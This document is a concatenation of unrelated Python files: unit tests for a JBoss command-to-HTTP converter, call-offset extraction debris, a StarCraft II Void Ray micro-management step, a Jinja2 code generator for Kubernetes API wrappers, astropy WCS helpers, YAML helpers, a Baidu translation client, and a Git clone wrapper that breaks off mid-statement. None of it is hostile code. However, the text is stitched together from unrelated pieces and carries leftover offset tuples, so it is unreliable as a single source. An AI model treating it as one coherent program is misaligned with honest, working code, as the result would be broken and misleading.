        self.assertEqual(result, desired_operation)
    def test_multiple_path_and_operation_no_params_http_get(self):
        """A command with multiple path segments and a bare operation converts correctly over GET."""
        test_data = '/subsystem=undertow/server=default-server:read-resource'
        desired_operation = {"operation": "resource", "address": "/subsystem/undertow/server/default-server"}
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_multiple_path_and_operation_empty_params_http_get(self):
        """A command with multiple path segments and an empty parameter list converts correctly over GET."""
        test_data = '/subsystem=undertow/server=default-server:read-resource()'
        desired_operation = {"operation": "resource", "address": "/subsystem/undertow/server/default-server"}
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_multiple_path_and_operation_single_param_http_get(self):
        """A command with multiple path segments and a single parameter converts correctly over GET."""
        test_data = '/subsystem=undertow/server=default-server:read-attribute(name=default-host)'
        desired_operation = {
            "operation": "attribute", "name": "default-host",
            "address": "/subsystem/undertow/server/default-server"
        }
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_multiple_path_and_operation_multiple_param_http_get(self):
        """A command with multiple path segments and multiple parameters converts correctly over GET."""
        test_data = '/subsystem=undertow/server=default-server:read-attribute(resolve-expressions=true,include-defaults=true,name=servlet-container)'
        desired_operation = {
            "operation": "attribute", "resolve-expressions": "true", "include-defaults": "true",
            "name": "servlet-container", "address": "/subsystem/undertow/server/default-server"
        }
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
class TestJBOSSCommandToHTTPPOSTRequestTestCase(unittest.TestCase):
    """Test case for convert.jboss_command_to_http_request with resource paths over HTTP POST.

    For POST conversions the path becomes an "address" list of segments
    and the operation name is kept verbatim.
    """

    def test_single_path_and_operation_no_params_http_post(self):
        """A command with one path segment and a bare operation converts correctly over POST."""
        test_data = '/core-service=management:whoami'
        desired_operation = {"operation": "whoami", "address": ["core-service", "management"]}
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)

    def test_single_path_and_operation_single_param_http_post(self):
        """A command with one path segment and a single parameter converts correctly over POST."""
        test_data = '/core-service=server-environment:path-info(unit=GIGABYTES)'
        desired_operation = {
            "operation": "path-info", "unit": "GIGABYTES",
            "address": ["core-service", "server-environment"]
        }
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)

    def test_single_path_and_operation_multiple_params_http_post(self):
        """A command with one path segment and multiple parameters converts correctly over POST."""
        test_data = '/subsystem=undertow:write-attribute(name=statistics-enabled,value=true)'
        desired_operation = {
            "operation": "write-attribute", "name": "statistics-enabled", "value": "true",
            "address": ["subsystem", "undertow"]
        }
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)

    def test_multiple_path_and_operation_no_params_http_post(self):
        """A command with multiple path segments and no parameters converts correctly over POST."""
        test_data = "/subsystem=datasources/data-source=ExampleDS:dump-queued-threads-in-pool()"
        desired_operation = {
            "operation": "dump-queued-threads-in-pool",
            "address": ["subsystem", "datasources", "data-source", "ExampleDS"]
        }
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)

    def test_multiple_path_and_operation_single_param_http_post(self):
        """A command with multiple path segments and a single parameter converts correctly over POST."""
        test_data = "/core-service=management/service=configuration-changes:add(max-history=200)"
        desired_operation = {
            "operation": "add", "max-history": "200",
            "address": ["core-service", "management", "service", "configuration-changes"]
        }
        # BUG FIX: the expected-result dict was previously passed where the
        # HTTP method string "POST" belongs (copy-paste error).
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)

    def test_multiple_path_and_operation_multiple_param_http_post(self):
        """A command with multiple path segments and multiple parameters converts correctly over POST."""
        test_data = "/subsystem=datasources/data-source=ExampleDS:write-attribute(name=max-pool-size,value=5000)"
        desired_operation = {
            "operation": "write-attribute", "name": "max-pool-size", "value": "5000",
            "address": ["subsystem", "datasources", "data-source", "ExampleDS"]
        }
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)
# Run all TestCase classes in this module via unittest's CLI runner.
if __name__ == '__main__':
    unittest.main()
| [
"unittest.main",
"convert.jboss_command_to_http_request"
] | [((10959, 10974), 'unittest.main', 'unittest.main', ([], {}), '()\n', (10972, 10974), False, 'import unittest\n'), ((489, 536), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (518, 536), False, 'from convert import jboss_command_to_http_request\n'), ((854, 901), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (883, 901), False, 'from convert import jboss_command_to_http_request\n'), ((1271, 1318), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (1300, 1318), False, 'from convert import jboss_command_to_http_request\n'), ((1719, 1766), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (1748, 1766), False, 'from convert import jboss_command_to_http_request\n'), ((2251, 2299), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (2280, 2299), False, 'from convert import jboss_command_to_http_request\n'), ((2624, 2672), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (2653, 2672), False, 'from convert import jboss_command_to_http_request\n'), ((3044, 3092), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (3073, 3092), False, 'from convert import jboss_command_to_http_request\n'), ((3524, 3572), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (3553, 3572), False, 'from convert import jboss_command_to_http_request\n'), ((4075, 4122), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', 
(['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (4104, 4122), False, 'from convert import jboss_command_to_http_request\n'), ((4587, 4634), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (4616, 4634), False, 'from convert import jboss_command_to_http_request\n'), ((5158, 5205), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (5187, 5205), False, 'from convert import jboss_command_to_http_request\n'), ((5632, 5679), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (5661, 5679), False, 'from convert import jboss_command_to_http_request\n'), ((6111, 6158), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (6140, 6158), False, 'from convert import jboss_command_to_http_request\n'), ((6667, 6714), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (6696, 6714), False, 'from convert import jboss_command_to_http_request\n'), ((7358, 7405), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""GET"""'], {}), "(test_data, 'GET')\n", (7387, 7405), False, 'from convert import jboss_command_to_http_request\n'), ((7915, 7963), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (7944, 7963), False, 'from convert import jboss_command_to_http_request\n'), ((8447, 8495), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (8476, 8495), False, 'from convert import jboss_command_to_http_request\n'), ((9017, 9065), 'convert.jboss_command_to_http_request', 
'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (9046, 9065), False, 'from convert import jboss_command_to_http_request\n'), ((9594, 9642), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (9623, 9642), False, 'from convert import jboss_command_to_http_request\n'), ((10182, 10241), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', 'desired_operation'], {}), '(test_data, desired_operation)\n', (10211, 10241), False, 'from convert import jboss_command_to_http_request\n'), ((10825, 10873), 'convert.jboss_command_to_http_request', 'jboss_command_to_http_request', (['test_data', '"""POST"""'], {}), "(test_data, 'POST')\n", (10854, 10873), False, 'from convert import jboss_command_to_http_request\n')] |
from sc2.ids.effect_id import EffectId
from sc2.position import Point2
from sc2.units import Units
from sharpy.managers.combat2 import MicroStep, Action, MoveType
from sc2 import AbilityId
from sc2.unit import Unit
class MicroVoidrays(MicroStep):
    """Micro-management step for Void Rays: dodge hazards, retreat when
    weak, and trigger Prismatic Alignment against armored enemies."""

    def should_retreat(self, unit: Unit) -> bool:
        """Return True when the unit is badly damaged, cannot attack, or
        stands inside a dangerous ground effect."""
        total_max = unit.shield_max + unit.health_max
        hp_ratio = (unit.shield + unit.health) / total_max if total_max > 0 else 0
        if hp_ratio < 0.2 or unit.weapon_cooldown < 0:
            # Low hp, or the unit currently can't attack.
            return True
        # Hazardous effects and the distance at which we dodge each one.
        dodge_radius = {
            EffectId.RAVAGERCORROSIVEBILECP: 3,
            EffectId.BLINDINGCLOUDCP: 4,
            EffectId.PSISTORMPERSISTENT: 4,
        }
        for effect in self.ai.state.effects:
            radius = dodge_radius.get(effect.id)
            if radius is not None and Point2.center(effect.positions).distance_to(unit) < radius:
                return True
        return False

    def group_solve_combat(self, units: Units, current_command: Action) -> Action:
        """No group-level adjustment: keep the incoming command."""
        return current_command

    def unit_solve_combat(self, unit: Unit, current_command: Action) -> Action:
        """Choose an action for a single Void Ray in combat."""
        no_engagement = self.engage_ratio < 0.25 and self.can_engage_ratio < 0.25
        retreating = self.move_type in {MoveType.PanicRetreat, MoveType.DefensiveRetreat}
        if no_engagement or retreating:
            return current_command
        if self.cd_manager.is_ready(unit.tag, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT):
            armored_targets = self.cache.enemy_in_range(unit.position, 7).filter(lambda u: u.is_armored)
            if armored_targets:
                # Armored enemies nearby: fire up Prismatic Alignment.
                return Action(None, False, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT)
        if not self.should_shoot() and self.should_retreat(unit):
            safe_spot = self.pather.find_weak_influence_air(unit.position, 4)
            return Action(safe_spot, False)
        return self.focus_fire(unit, current_command, None)

    def should_shoot(self):
        """Fire window: the first 8 ticks of every 24-loop cycle."""
        return self.ai.state.game_loop % 24 < 8
| [
"sharpy.managers.combat2.Action",
"sc2.position.Point2.center"
] | [((2070, 2088), 'sharpy.managers.combat2.Action', 'Action', (['pos', '(False)'], {}), '(pos, False)\n', (2076, 2088), False, 'from sharpy.managers.combat2 import MicroStep, Action, MoveType\n'), ((1848, 1911), 'sharpy.managers.combat2.Action', 'Action', (['None', '(False)', 'AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT'], {}), '(None, False, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT)\n', (1854, 1911), False, 'from sharpy.managers.combat2 import MicroStep, Action, MoveType\n'), ((751, 782), 'sc2.position.Point2.center', 'Point2.center', (['effect.positions'], {}), '(effect.positions)\n', (764, 782), False, 'from sc2.position import Point2\n'), ((911, 942), 'sc2.position.Point2.center', 'Point2.center', (['effect.positions'], {}), '(effect.positions)\n', (924, 942), False, 'from sc2.position import Point2\n'), ((1074, 1105), 'sc2.position.Point2.center', 'Point2.center', (['effect.positions'], {}), '(effect.positions)\n', (1087, 1105), False, 'from sc2.position import Point2\n')] |
#
# Copyright (c) 2019 EXXETA AG and others.
#
# This file is part of k8s-python-tools
# (see https://github.com/EXXETA/k8s-python-tools).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import re
from jinja2 import Environment, FileSystemLoader
"""load self-defined generated_library.yml and use this information to generate api methods.
using jinja2 templating engine to generate python files
"""
# Resolve paths relative to this script so it works from any working dir.
__location__ = os.path.join(os.getcwd(), os.path.dirname(__file__))

try:
    # Prefer the fast libyaml-backed loader when available.
    from yaml import CLoader as Loader, CDumper as Dumper, load
except ImportError:
    # BUG FIX: 'load' must be imported in the fallback too, otherwise
    # the later load() call raises NameError when libyaml is missing.
    from yaml import Loader, Dumper, load

# Context manager guarantees the definition file is closed after reading.
with open(os.path.join(__location__, 'generated_library.yml'), 'r') as text_io:
    data = load(text_io, Loader=Loader)
# Jinja2 environment that loads templates from the local "templates" folder.
env = Environment(
    loader=FileSystemLoader(os.path.join(__location__, "templates")),
    # autoescape=select_autoescape(['html'])
)
def camelcase_to_snake_case(name):
    """Convert a CamelCase identifier to snake_case."""
    # First put an underscore before each Capitalized word, then before any
    # remaining upper-case letter that follows a lower-case letter or digit.
    with_boundaries = re.sub(r'(.)([A-Z][a-z]+)', r'\1_\2', name)
    return re.sub(r'([a-z0-9])([A-Z])', r'\1_\2', with_boundaries).lower()
# Expose the snake_case converter to templates as the "normalize" filter.
env.filters['normalize'] = camelcase_to_snake_case

# generating api methods
for lib_name, lib_def in data["lib_def"].items():
    file_name = lib_def["file"]
    template_name = lib_def["template"]
    entries = lib_def["entries"]
    print("generated", "./lib/" + file_name)
    template = env.get_template(template_name)
    rendered = template.render(entries=entries)
    # Context manager guarantees the generated file is flushed and closed
    # (the original opened/closed the handle manually).
    with open(os.path.join(__location__, "./lib/" + file_name), "w") as out_file:
        out_file.write(rendered)
# generating api actions
for action_name, action_def in data["actions"].items():
    base_path = action_def["destination"]
    template_name = action_def["template"]
    entries = action_def["entries"]
    print("auto-generated", len(entries), "actions in destination", base_path)
    template = env.get_template(template_name)
    for item in entries:
        rendered = template.render(item=item)
        # Output file name is the snake_case form of the action name.
        out_path = os.path.join(__location__, "./lib/" + base_path + "/" +
                                camelcase_to_snake_case(item["name"]) + ".py")
        # Context manager replaces the manual open/write/close triple.
        with open(out_path, "w") as out_file:
            out_file.write(rendered)
print("OK")
| [
"os.path.join",
"yaml.load",
"os.getcwd",
"os.path.dirname",
"re.sub"
] | [((1431, 1459), 'yaml.load', 'load', (['text_io'], {'Loader': 'Loader'}), '(text_io, Loader=Loader)\n', (1435, 1459), False, 'from yaml import CLoader as Loader, CDumper as Dumper, load\n'), ((1184, 1195), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1193, 1195), False, 'import os\n'), ((1197, 1222), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1212, 1222), False, 'import os\n'), ((1366, 1417), 'os.path.join', 'os.path.join', (['__location__', '"""generated_library.yml"""'], {}), "(__location__, 'generated_library.yml')\n", (1378, 1417), False, 'import os\n'), ((1659, 1702), 're.sub', 're.sub', (['"""(.)([A-Z][a-z]+)"""', '"""\\\\1_\\\\2"""', 'name'], {}), "('(.)([A-Z][a-z]+)', '\\\\1_\\\\2', name)\n", (1665, 1702), False, 'import re\n'), ((2162, 2210), 'os.path.join', 'os.path.join', (['__location__', "('./lib/' + file_name)"], {}), "(__location__, './lib/' + file_name)\n", (2174, 2210), False, 'import os\n'), ((1524, 1563), 'os.path.join', 'os.path.join', (['__location__', '"""templates"""'], {}), "(__location__, 'templates')\n", (1536, 1563), False, 'import os\n'), ((1713, 1755), 're.sub', 're.sub', (['"""([a-z0-9])([A-Z])"""', '"""\\\\1_\\\\2"""', 's1'], {}), "('([a-z0-9])([A-Z])', '\\\\1_\\\\2', s1)\n", (1719, 1755), False, 'import re\n')] |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""WCS related utility functions."""
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
from astropy.wcs import WCS
from astropy.coordinates import Angle
# Public API of this module.
__all__ = [
    'linear_wcs_to_arrays',
    'linear_arrays_to_wcs',
    'get_wcs_ctype',
    'get_resampled_wcs'
]
def get_wcs_ctype(wcs):
    """Return the celestial coordinate type of a WCS instance.

    Parameters
    ----------
    wcs : `~astropy.wcs.WCS`
        WCS transformation instance.

    Returns
    -------
    ctype : {'galactic', 'icrs'}
        String specifying the coordinate type, usable with
        `~astropy.coordinates.SkyCoord`.

    Raises
    ------
    TypeError
        If neither a galactic nor an equatorial axis is found.
    """
    first, second = wcs.wcs.ctype[0], wcs.wcs.ctype[1]
    if 'GLON' in first or 'GLON' in second:
        return 'galactic'
    if 'RA' in first or 'RA' in second:
        return 'icrs'
    raise TypeError("Can't determine WCS coordinate type.")
def get_resampled_wcs(wcs, factor, downsampled):
    """Return a copy of ``wcs`` with the pixel size rescaled by ``factor``.

    If ``downsampled`` is true the pixel size grows by ``factor``,
    otherwise it shrinks (upsampling). The reference pixel is shifted
    so that the reference sky position is preserved.
    """
    resampled = wcs.deepcopy()
    scale = factor if downsampled else 1.0 / factor
    resampled.wcs.cdelt *= scale
    resampled.wcs.crpix = (resampled.wcs.crpix - 0.5) / scale + 0.5
    return resampled
def linear_wcs_to_arrays(wcs, nbins_x, nbins_y):
    """Make a 2D linear binning from a WCS object.

    This method gives the correct answer only for linear X, Y binning and
    expects angular quantities in the WCS object. X is identified with WCS
    axis 1, Y with WCS axis 2. The number of bins is required as input
    because it is not stored in the WCS object itself.

    Parameters
    ----------
    wcs : `~astropy.wcs.WCS`
        WCS object describing the bin coordinates
    nbins_x : int
        number of bins in X coordinate
    nbins_y : int
        number of bins in Y coordinate

    Returns
    -------
    bin_edges_x : `~astropy.coordinates.Angle`
        array with the bin edges for the X coordinate
    bin_edges_y : `~astropy.coordinates.Angle`
        array with the bin edges for the Y coordinate
    """
    if wcs.wcs.naxis != 2:
        raise ValueError("Expected exactly 2 dimensions, got {}"
                         .format(wcs.wcs.naxis))
    # NOTE: linearity of the WCS axes is assumed, not verified (TODO).
    unit_x, unit_y = wcs.wcs.cunit
    step_x = Angle(wcs.wcs.cdelt[0], unit_x)
    step_y = Angle(wcs.wcs.cdelt[1], unit_y)

    # Relative bin edges, starting at zero.
    bin_edges_x = np.arange(nbins_x + 1) * step_x
    bin_edges_y = np.arange(nbins_y + 1) * step_y

    # Shift edges to absolute values according to the WCS reference.
    # In FITS, the edge of the image is at pixel coordinate +0.5.
    refpix_x, refpix_y = wcs.wcs.crpix
    refval_x, refval_y = wcs.wcs.crval
    bin_edges_x += Angle(refval_x, unit_x) - (refpix_x - 0.5) * step_x
    bin_edges_y += Angle(refval_y, unit_y) - (refpix_y - 0.5) * step_y

    # Snap values that are tiny compared to the step size to exactly 0.
    for edges, step, unit in ((bin_edges_x, step_x, unit_x),
                              (bin_edges_y, step_y, unit_y)):
        for i in range(len(edges)):
            if np.abs(edges[i] / step) < 1e-10:
                edges[i] = Angle(0., unit)
    return bin_edges_x, bin_edges_y
def linear_arrays_to_wcs(name_x, name_y, bin_edges_x, bin_edges_y):
    """Build a 2-axis linear `~astropy.wcs.WCS` from bin-edge arrays.

    Gives the correct answer only for linear X, Y binning. X maps to
    WCS axis 1 and Y to WCS axis 2; both edge arrays must share the
    same angular unit.

    Parameters
    ----------
    name_x, name_y : str
        names of the X / Y coordinates, used as 'CTYPE' values
    bin_edges_x, bin_edges_y : `~astropy.coordinates.Angle`
        arrays with the bin edges for the X / Y coordinates

    Returns
    -------
    wcs : `~astropy.wcs.WCS`
        WCS object describing the bin coordinates
    """
    unit_x = bin_edges_x.unit
    unit_y = bin_edges_y.unit
    if unit_x != unit_y:
        ss_error = "Units of X ({0}) and Y ({1}) bins do not match!".format(
            unit_x, unit_y)
        ss_error += " Is this expected?"
        raise ValueError(ss_error)
    # Pixel step on each axis: total span divided by the number of bins.
    n_x = len(bin_edges_x) - 1
    n_y = len(bin_edges_y) - 1
    step_x = (bin_edges_x[-1] - bin_edges_x[0]) / n_x
    step_y = (bin_edges_y[-1] - bin_edges_y[0]) / n_y
    # A fresh WCS; the number of axes must be fixed at construction time.
    wcs = WCS(naxis=2)
    wcs.wcs.ctype = [name_x, name_y]
    wcs.wcs.cunit = [unit_x, unit_y]
    wcs.wcs.cdelt = [step_x.to(unit_x).value, step_y.to(unit_y).value]
    # Reference at the lower-left corner: in FITS, pixel coordinate 0.5
    # marks the image edge, i.e. the start of the (X, Y) bin coordinates.
    wcs.wcs.crpix = [0.5, 0.5]
    wcs.wcs.crval = [(bin_edges_x[0] + (wcs.wcs.crpix[0] - 0.5) * step_x).to(unit_x).value,
                     (bin_edges_y[0] + (wcs.wcs.crpix[1] - 0.5) * step_y).to(unit_y).value]
    return wcs
| [
"numpy.abs",
"astropy.wcs.WCS",
"numpy.arange",
"astropy.coordinates.Angle"
] | [((2472, 2494), 'astropy.coordinates.Angle', 'Angle', (['delta_x', 'unit_x'], {}), '(delta_x, unit_x)\n', (2477, 2494), False, 'from astropy.coordinates import Angle\n'), ((2509, 2531), 'astropy.coordinates.Angle', 'Angle', (['delta_y', 'unit_y'], {}), '(delta_y, unit_y)\n', (2514, 2531), False, 'from astropy.coordinates import Angle\n'), ((2859, 2882), 'astropy.coordinates.Angle', 'Angle', (['refval_x', 'unit_x'], {}), '(refval_x, unit_x)\n', (2864, 2882), False, 'from astropy.coordinates import Angle\n'), ((2898, 2921), 'astropy.coordinates.Angle', 'Angle', (['refval_y', 'unit_y'], {}), '(refval_y, unit_y)\n', (2903, 2921), False, 'from astropy.coordinates import Angle\n'), ((4560, 4572), 'astropy.wcs.WCS', 'WCS', ([], {'naxis': '(2)'}), '(naxis=2)\n', (4563, 4572), False, 'from astropy.wcs import WCS\n'), ((4698, 4738), 'astropy.coordinates.Angle', 'Angle', (['[bin_edges_x[0], bin_edges_x[-1]]'], {}), '([bin_edges_x[0], bin_edges_x[-1]])\n', (4703, 4738), False, 'from astropy.coordinates import Angle\n'), ((4753, 4793), 'astropy.coordinates.Angle', 'Angle', (['[bin_edges_y[0], bin_edges_y[-1]]'], {}), '([bin_edges_y[0], bin_edges_y[-1]])\n', (4758, 4793), False, 'from astropy.coordinates import Angle\n'), ((2550, 2572), 'numpy.arange', 'np.arange', (['(nbins_x + 1)'], {}), '(nbins_x + 1)\n', (2559, 2572), True, 'import numpy as np\n'), ((2601, 2623), 'numpy.arange', 'np.arange', (['(nbins_y + 1)'], {}), '(nbins_y + 1)\n', (2610, 2623), True, 'import numpy as np\n'), ((3150, 3182), 'numpy.abs', 'np.abs', (['(bin_edges_x[i] / delta_x)'], {}), '(bin_edges_x[i] / delta_x)\n', (3156, 3182), True, 'import numpy as np\n'), ((3222, 3240), 'astropy.coordinates.Angle', 'Angle', (['(0.0)', 'unit_x'], {}), '(0.0, unit_x)\n', (3227, 3240), False, 'from astropy.coordinates import Angle\n'), ((3293, 3325), 'numpy.abs', 'np.abs', (['(bin_edges_y[i] / delta_y)'], {}), '(bin_edges_y[i] / delta_y)\n', (3299, 3325), True, 'import numpy as np\n'), ((3365, 3383), 
'astropy.coordinates.Angle', 'Angle', (['(0.0)', 'unit_y'], {}), '(0.0, unit_y)\n', (3370, 3383), False, 'from astropy.coordinates import Angle\n')] |
import yaml
from merceedge.exceptions import MerceEdgeError
from merceedge.settings import (
logger_access,
logger_code,
logger_console
)
_LOGGER = logger_code
def load_yaml(fname):
    """Parse the YAML file at *fname* and return its content as a dict.

    An empty file yields ``{}``. Malformed YAML is logged and re-raised
    as :class:`MerceEdgeError`.
    """
    try:
        with open(fname, encoding='utf-8') as conf_file:
            # safe_load returns None for an empty document; normalize
            # that to an empty dict for callers.
            content = yaml.safe_load(conf_file)
            return content or {}
    except yaml.YAMLError:
        error = 'Error reading YAML configuration file {}'.format(fname)
        _LOGGER.exception(error)
        raise MerceEdgeError(error)
def write_yaml(fname, yaml_dict):
    """Serialize *yaml_dict* to *fname* in block (non-flow) YAML style.

    YAML serialization failures are logged and re-raised as
    :class:`MerceEdgeError`.
    """
    try:
        with open(fname, 'w', encoding='utf-8') as outfile:
            yaml.dump(yaml_dict, outfile, default_flow_style=False)
    except yaml.YAMLError:
        err_text = 'Error write YAML configuration file {}'.format(fname)
        _LOGGER.exception(err_text)
        raise MerceEdgeError(err_text)
| [
"merceedge.exceptions.MerceEdgeError",
"yaml.safe_load",
"yaml.dump"
] | [((599, 620), 'merceedge.exceptions.MerceEdgeError', 'MerceEdgeError', (['error'], {}), '(error)\n', (613, 620), False, 'from merceedge.exceptions import MerceEdgeError\n'), ((776, 831), 'yaml.dump', 'yaml.dump', (['yaml_dict', 'outfile'], {'default_flow_style': '(False)'}), '(yaml_dict, outfile, default_flow_style=False)\n', (785, 831), False, 'import yaml\n'), ((977, 998), 'merceedge.exceptions.MerceEdgeError', 'MerceEdgeError', (['error'], {}), '(error)\n', (991, 998), False, 'from merceedge.exceptions import MerceEdgeError\n'), ((420, 445), 'yaml.safe_load', 'yaml.safe_load', (['conf_file'], {}), '(conf_file)\n', (434, 445), False, 'import yaml\n')] |
import random
import hashlib
import requests
from cctrans import conf
import cctrans
def _sign(app_key, secret_key, text):
salt = random.randint(32768, 65536)
sign = app_key + text + str(salt) + secret_key
return hashlib.md5(sign.encode('utf8')).hexdigest(), salt
def _request_data(url, app_key, text, salt, sign, from_lang='en', to_lang='zh'):
"""
:rtype: object
"""
return "{url}?appid={app_key}&q={text}&from={from_lang}&to={to_lang}&salt={salt}&sign={sign}".format(
**locals()
)
def translation(text, url):
    """Translate *text* through the Baidu API at *url*.

    Returns a list of translated strings (one per result entry), or
    None when the response carries no 'trans_result' payload.
    """
    app_key = conf.baidu_app_id
    secret_key = conf.baidu_secret_key
    sign, salt = _sign(app_key, secret_key, text)
    request_url = _request_data(url=url,
                                app_key=app_key,
                                text=text,
                                salt=salt,
                                sign=sign,
                                from_lang=cctrans.from_lang,
                                to_lang=cctrans.to_lang)
    resp = requests.get(request_url).json()
    payload = resp.get('trans_result')
    if not payload:
        return None
    return [entry['dst'] for entry in payload]
| [
"random.randint",
"requests.get"
] | [((137, 165), 'random.randint', 'random.randint', (['(32768)', '(65536)'], {}), '(32768, 65536)\n', (151, 165), False, 'import random\n'), ((979, 997), 'requests.get', 'requests.get', (['data'], {}), '(data)\n', (991, 997), False, 'import requests\n')] |
import os
import sys
from time import sleep
from typing import Optional
from joint_teapot.utils.logger import logger
current_path = sys.path[0]
sys.path.remove(current_path)
from git import Repo
from git.exc import GitCommandError
sys.path.insert(0, current_path)
from joint_teapot.config import settings
class Git:
    """Thin wrapper around GitPython for cloning and resetting repos
    hosted under one organization on the Gitea at focs.ji.sjtu.edu.cn."""

    def __init__(
        self,
        org_name: str = settings.gitea_org_name,
        repos_dir: str = settings.repos_dir,
    ):
        # repos_dir must already exist; this class never creates it.
        self.org_name = org_name
        if not os.path.isdir(repos_dir):
            raise Exception(f"{repos_dir} does not exist! Create it first.")
        self.repos_dir = repos_dir
        logger.debug("Git initialized")

    def clone_repo(
        self, repo_name: str, branch: str = "master", auto_retry: bool = True
    ) -> Optional[Repo]:
        """Clone <org>/<repo_name> over SSH into repos_dir.

        Retries with exponential backoff (2s, 4s, ... capped at 64s) on
        connection refused/reset errors; returns None if the requested
        branch does not exist upstream.
        NOTE(review): with auto_retry=False the loop body never runs, so
        no clone is attempted at all and None is returned — confirm this
        is intended.
        """
        repo = None
        repo_dir = os.path.join(self.repos_dir, repo_name)
        retry_interval = 2
        # retry_interval doubles on transient failures and is zeroed to
        # terminate the loop on success or a permanent error.
        while retry_interval and auto_retry:
            try:
                repo = Repo.clone_from(
                    f"ssh://git@focs.ji.sjtu.edu.cn:2222/{self.org_name}/{repo_name}.git",
                    repo_dir,
                    branch=branch,
                )
                retry_interval = 0
            except GitCommandError as e:
                # Transient network failure (likely the campus firewall):
                # back off and retry.
                if "Connection refused" in e.stderr or "Connection reset" in e.stderr:
                    logger.warning(
                        f"{repo_name} connection refused/reset in clone. "
                        "Probably by JI firewall."
                    )
                    logger.info(f"wait for {retry_interval} seconds to retry...")
                    sleep(retry_interval)
                    if retry_interval < 64:
                        retry_interval *= 2
                elif f"Remote branch {branch} not found in upstream origin" in e.stderr:
                    # Permanent: the branch does not exist; give up quietly.
                    retry_interval = 0
                    logger.error(f"{repo_name} origin/{branch} not found")
                else:
                    raise
        return repo

    def get_repo(self, repo_name: str) -> Optional[Repo]:
        """Return a Repo for an already-cloned checkout, cloning it first
        if the local directory is missing."""
        repo_dir = os.path.join(self.repos_dir, repo_name)
        if os.path.exists(repo_dir):
            return Repo(repo_dir)
        return self.clone_repo(repo_name)

    def repo_clean_and_checkout(
        self, repo_name: str, checkout_dest: str, auto_retry: bool = True
    ) -> str:
        """Hard-reset the repo to origin/master, wipe untracked files and
        check out *checkout_dest* (branch/tag/commit); returns the local
        repo directory path either way.
        NOTE(review): as in clone_repo, auto_retry=False skips the loop
        body entirely, so nothing is fetched or checked out.
        """
        repo_dir = os.path.join(self.repos_dir, repo_name)
        repo = self.get_repo(repo_name)
        if not repo:
            return repo_dir
        retry_interval = 2
        while retry_interval and auto_retry:
            try:
                repo.git.fetch("--tags", "--all", "-f")
                repo.git.reset("--hard", "origin/master")
                # -x also removes ignored files, giving a pristine tree.
                repo.git.clean("-d", "-f", "-x")
                repo.git.checkout(checkout_dest)
                retry_interval = 0
            except GitCommandError as e:
                if "Connection refused" in e.stderr or "Connection reset" in e.stderr:
                    logger.warning(
